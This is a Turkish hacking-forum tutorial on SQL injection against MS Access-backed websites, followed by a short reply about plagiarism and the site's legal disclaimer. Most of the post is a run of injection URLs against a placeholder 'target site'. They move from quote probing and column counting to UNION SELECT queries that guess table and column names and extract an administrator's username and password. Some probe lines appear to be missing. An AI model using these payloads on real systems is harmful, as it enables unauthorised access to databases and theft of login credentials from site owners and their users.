MsAccess SQL İnjection -

S4cuRiTy EneMy

Yaşayan Forum Efsanesi
24 Nis 2012
8,773
6
root@server

bu konumda size çok karşılaşılan bir açık olan MsAccess sql injectiondan bahsedeceğim.

Ayrıca şunuda söyliyeyim: Bana göre en zahmetli SQL İnjection türüdür.Ama öğrenmek lazım :)

hemen geçelim:

Açık ararken klasik şekilde ’a veya ’ koyuyoruz.



hata geldi şimdi kolon bulucaz.



dedik hata geldi


dedik hata gitti demekki kolon sayımız 9muş.

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from admin

diyoruz.

Farkettiyseniz direkt olarak union select komutu yazmadım sonuna adminde ekledim.Çünkü MsAccess’de direkt olarak kolonlar gözükmez.

yukarda komutumuzu girmiştik hata geldi.

tekrar deniyoruz:

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from users


dedik ve kolonları gördük.Yani admin’imizle ilgili tablomuz users’imiş.

5. kolon gözükmüş olsun.


www.hedefsite.com/show.php?id=3 union select 1,2,3,4,admin,6,7,8,9 from users

dedik hata geldi.Çünkü yanlış kolon adı girdik.pes etmiyoruz :)

www.hedefsite.com/show.php?id=3 union select 1,2,3,4,username,6,7,8,9 from users

dedik ve kolonumuzda gözüktü usernamemiz.

username = HoLMeS :)

şimdi sıra şifrede

www.hedefsite.com/show.php?id=3 union select 1,2,3,pass,5,6,7,8,9 from users

dedik ve şifrede gözüktü.

username = HoLMeS
pass = holmes

buraya kadar arkadaşlar.


 
5 Tem 2013
133
0
arkadaşlar konu benden alıntıdır hatta kanıtı konunun içindedir.lütfen alıntı olduğu belirtilsin yada gereği yapılsın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.